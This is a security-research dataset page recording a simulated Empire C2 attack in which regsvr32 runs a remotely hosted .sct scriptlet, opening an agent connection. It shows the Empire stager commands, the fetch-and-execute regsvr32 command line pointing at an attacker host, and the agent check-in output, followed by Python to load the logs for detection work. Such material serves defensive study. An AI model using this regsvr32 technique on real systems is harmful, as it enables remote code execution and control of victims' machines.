Empire Regsvr32 Execution

Metadata

Contributors

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2020/07/21

Modification Date

2020/07/21

Tactics

TA0005

Techniques

T1218.010

Tags

Regsvr32 Execution

Dataset Description

This dataset represents threat actors leveraging regsvr32 to proxy the execution of an empire payload (.sct file) to create a reverse connection to the C2.

Simulation Metadata

Tools

type

Name

Module

C2

Empire

launcher

Adversary View

Threat Actor View:
(Empire) > usestager windows/launcher_sct
(Empire: stager/windows/launcher_sct) > info

Name: regsvr32

Description:
  Generates an sct file (COM Scriptlet) Host this
  anywhere

Options:

  Name             Required    Value             Description
  ----             --------    -------           -----------
  Listener         True                          Listener to generate stager for.
  Language         True        powershell        Language of the stager to generate.
  StagerRetries    False       0                 Times for the stager to retry
                                                connecting.
  Base64           True        True              Switch. Base64 encode the output.
  Obfuscate        False       False             Switch. Obfuscate the launcher
                                                powershell code, uses the
                                                ObfuscateCommand for obfuscation types.
                                                For powershell only.
  ObfuscateCommand False       Token\All\1       The Invoke-Obfuscation command to use.
                                                Only used if Obfuscate switch is True.
                                                For powershell only.
  OutFile          False       /tmp/launcher.sct File to output SCT to, otherwise
                                                displayed on the screen.
  UserAgent        False       default           User-agent string to use for the staging
                                                request (default, none, or other).
  Proxy            False       default           Proxy to use for request (default, none,
                                                or other).
  ProxyCreds       False       default           Proxy credentials
                                                ([domain\]username:password) to use for
                                                request (default, none, or other).


(Empire: stager/windows/launcher_sct) > set Listener http
(Empire: stager/windows/launcher_sct) > execute

[*] Stager output written out to: /tmp/launcher.sct

Victim's PC

PS C:\Windows\System32> .\regsvr32.exe /s /n /u /i:http://10.10.10.5:8444/launcher.sct scrobj.dll

Threat Actor View:

(Empire: stager/windows/launcher_sct) > back
(Empire) > 
Empire: agents) > 
[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5
[*] New agent 712ETU3B checked in
[+] Initial agent 712ETU3B from 172.18.39.5 now active (Slack)
[*] Sending agent (stage 2) to 712ETU3B at 172.18.39.5

(Empire: agents) > 
(Empire: agents) > 
(Empire: agents) > agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
712ETU3B ps 172.18.39.5     WORKSTATION5      *MORDOR\pgustavo        powershell         9076   5/0.0    2020-07-22 03:29:27  http            

(Empire: agents) >

Explore Datasets

Download & Decompress Dataset

import requests
from zipfile import ZipFile
from io import BytesIO

url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/empire_launcher_sct_regsvr32.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File

from pandas.io import json

df = json.read_json(path_or_buf=datasetJSONPath, lines=True)

Access Security Events

df.groupby(['Channel']).size().sort_values(ascending=False)